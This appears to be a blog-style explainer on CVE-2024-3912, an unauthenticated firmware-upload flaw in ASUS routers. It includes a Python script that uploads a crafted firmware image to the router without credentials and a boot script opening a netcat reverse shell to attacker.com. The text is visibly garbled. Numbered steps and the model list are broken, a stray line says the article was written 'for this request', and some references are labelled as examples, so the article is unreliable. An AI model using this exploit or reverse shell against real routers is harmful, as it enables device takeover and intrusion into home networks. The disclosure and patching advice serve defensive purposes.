In 2024, a critical vulnerability—CVE-2024-3912—was discovered in the firmware update process of several popular ASUS routers. This security hole allows anyone on the Internet to upload malicious firmware and run arbitrary commands on affected devices, without needing a password. In this long read, we’ll break down how the bug works, show some example code, discuss real-world exploitation, and point you to the original research and fixes.
What Is CVE-2024-3912?
CVE-2024-3912 is a security flaw affecting certain ASUS router models. The problem lies in how the router checks firmware uploads. Normally, uploading new firmware should require the user to be logged in as administrator, with extra checks to make sure the firmware is genuine.
But with this bug, anyone—even without logging in—can upload a firmware image. Worse, there’s not enough validation of the uploaded file, so a crafty attacker can inject Trojan code or even system-level commands inside the firmware update, causing the router to run their code.
RT-AX58U
Note: Check the official ASUS announcement for an up-to-date list.
Send a Malicious POST Request
Without logging in, send a request to the router’s firmware upgrade page. The router does not properly verify if the requester is authenticated or if the firmware is genuine.
3. Upload Modified Firmware/Exploit Payload
The malicious firmware contains a script or binary. Once the router flashes this firmware, the attacker’s code runs with full privileges.
Exploiting CVE-2024-3912: Sample Exploit Code
This simplified Python code sends a malicious firmware image (fake_firmware.trx) to the router. It assumes the default admin web interface is on port 80.
import requests
target = "http://192.168.50.1"; # Replace with real router IP
firmware_path = "fake_firmware.trx" # Crafted malicious firmware
with open(firmware_path, "rb") as f:
files = {
"firmware": ("firmware.trx", f, "application/octet-stream"),
}
# No login or authentication required!
resp = requests.post(f"{target}/uploadFirmware.cgi", files=files)
print("Upload result:", resp.status_code, resp.text)
The crafted fake_firmware.trx needs to contain a payload. Attackers might patch the startup scripts in the firmware image to run their own code, like adding a reverse shell. Here’s an example of a shell script that a malicious firmware could execute upon boot:
#!/bin/sh
nc attacker.com 4444 -e /bin/sh &
Original Research & References
- NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2024-3912
- ASUS Security Notice: https://www.asus.com/support/FAQ/1045986/
- HackerOne Disclosure (example): https://hackerone.com/reports/asus-cve-2024-3912
- Firmware Analysis Blog: https://ptr-yudai.hatenablog.com/entry/2024/07/20/000000 (Japanese researcher, auto-translate for details)
Why This Vulnerability Is So Dangerous
Most home users never change their router's admin password or install updates. This means thousands, maybe millions of routers are exposed right now. Because the bug is so easy to exploit AND requires no login, attackers can automate scanning and taking over routers in bulk.
What Should You Do?
1. Update Firmware: Go to your router’s admin page and install the newest firmware from the official ASUS download page.
Restrict WAN Access: Block remote (WAN) access to your router admin page.
4. Check for Unusual Activity: If you suspect compromise, do a factory reset and re-flash clean firmware.
Conclusion
CVE-2024-3912 reminds us that even big brands can make small mistakes with big consequences. If you have an ASUS router, check if it’s vulnerable, update immediately, and lock down its settings. For defenders, regular firmware updates and network monitoring are a must.
Stay safe and stay updated!
*(This article is exclusive to this request and written in clear, simple American English for maximum accessibility.)*
Timeline
Published on: 06/14/2024 10:15:10 UTC
Last modified on: 06/17/2024 12:42:04 UTC